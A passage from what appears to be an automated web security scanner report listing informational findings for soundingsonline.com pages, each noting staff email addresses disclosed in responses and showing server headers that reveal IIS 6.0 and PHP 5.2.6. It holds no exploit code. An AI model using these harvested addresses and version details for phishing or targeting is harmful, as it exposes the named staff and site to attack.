Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.402. http://www.soundingsonline.com/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com
s.jylkka@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:s.jylkka@soundingspub.com">
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.403. http://www.soundingsonline.com/columns-blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.404. http://www.soundingsonline.com/columns-blogs/bay-tripper previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.405. http://www.soundingsonline.com/columns-blogs/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.406. http://www.soundingsonline.com/columns-blogs/new-england-fishing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.407. http://www.soundingsonline.com/columns-blogs/under-way previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.408. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.409. http://www.soundingsonline.com/component/content/article/237622 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.410. http://www.soundingsonline.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The following email addresses were disclosed in the response:

advertising@soundingspub.com
circulation@soundingspub.com
e.cirillo@soundingspub.com
editorial@soundingspub.com
info@soundingspub.com
m.grzybowski@soundingspub.com
s.vasmatics@soundingspub.com
webmaster@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
...[SNIP]...
<a href="mailto:advertising@soundingspub.com">advertising@soundingspub.com</a>
...[SNIP]...
<a href="mailto:editorial@soundingspub.com">editorial@soundingspub.com</a>
...[SNIP]...
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
...[SNIP]...
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.411. http://www.soundingsonline.com/features previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.412. http://www.soundingsonline.com/features/destinations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.413. http://www.soundingsonline.com/features/in-depth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.414. http://www.soundingsonline.com/features/justyesterday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.415. http://www.soundingsonline.com/features/lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.416. http://www.soundingsonline.com/features/profiles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.417. http://www.soundingsonline.com/features/technical previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.418. http://www.soundingsonline.com/features/type-of-boat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.419. http://www.soundingsonline.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

24.420. http://www.soundingsonline.com/more/digital-publications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.421. http://www.soundingsonline.com/more/the-masters-series previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The following email addresses were disclosed in the response:

c.brayfield@soundingspub.com
e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:c.brayfield@soundingspub.com">c.brayfield@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.422. http://www.soundingsonline.com/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.423. http://www.soundingsonline.com/news/coastwise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.424. http://www.soundingsonline.com/news/dispatches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.425. http://www.soundingsonline.com/news/home-waters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
